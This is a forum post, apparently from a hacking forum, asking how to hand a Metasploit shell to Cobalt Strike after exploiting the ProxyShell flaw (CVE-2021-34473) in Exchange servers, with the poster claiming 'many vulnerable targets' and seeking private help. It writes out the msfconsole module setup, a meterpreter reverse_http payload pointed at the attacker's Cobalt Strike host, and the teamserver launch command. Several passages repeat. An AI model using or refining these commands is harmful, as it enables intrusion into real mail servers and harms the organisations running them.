Is anyone here familiar with passing msfconsole shell to cobalt strike using the Proxy-shell CVE-2021-34473?
I have many vulnerable targets that I want to test on. If intressted and can help me out write me a message.
This is what I tried:
MSFConsole
After setting up Metasploit, I fired up my Cobalt Session
Cobalt Strike
(I left the default listener on `50050`)
the listener of Cobalt Strike I am not really sure. I added a simple listener (for example on port 443 or 80). When exploit the target (exploit -j), it says: Exploit completed. But no session created.
Do I need to change / adjust something else in this graph?
or what should I do with my added listener in cobalt strike?
I have many vulnerable targets that I want to test on. If intressted and can help me out write me a message.
This is what I tried:
MSFConsole
Код:
sudo systemctl start postgresql
msfdb init
msfconsole
use exploit/windows/http/exchange_proxyshell_rce
set payload windows/x64/meterpreter/reverse_http(s?)
set RHOSTS [targetIP]
set RPORT 443 (default)
set LHOST [Cobalt Strikes IP or hostname]
set DisablePayloadHandler true
set PrependMigrate true
set AllowNoCleanup true
After setting up Metasploit, I fired up my Cobalt Session
Cobalt Strike
Код:
./teamserver [Cobalt Strikes IP or hostname] [password] [profile]
the listener of Cobalt Strike I am not really sure. I added a simple listener (for example on port 443 or 80). When exploit the target (exploit -j), it says: Exploit completed. But no session created.
Do I need to change / adjust something else in this graph?
Код:
RHOSTS <targetIP>
RPORT 443 (default)
SRVHOST ??
SRVPORT 8080 (default)
Payload options (windows/x64/meterpreter/reverse_http):
LHOST [Cobalt Strikes IP or hostname]
LPORT 50050 (default cobalt listener (or change?)
or what should I do with my added listener in cobalt strike?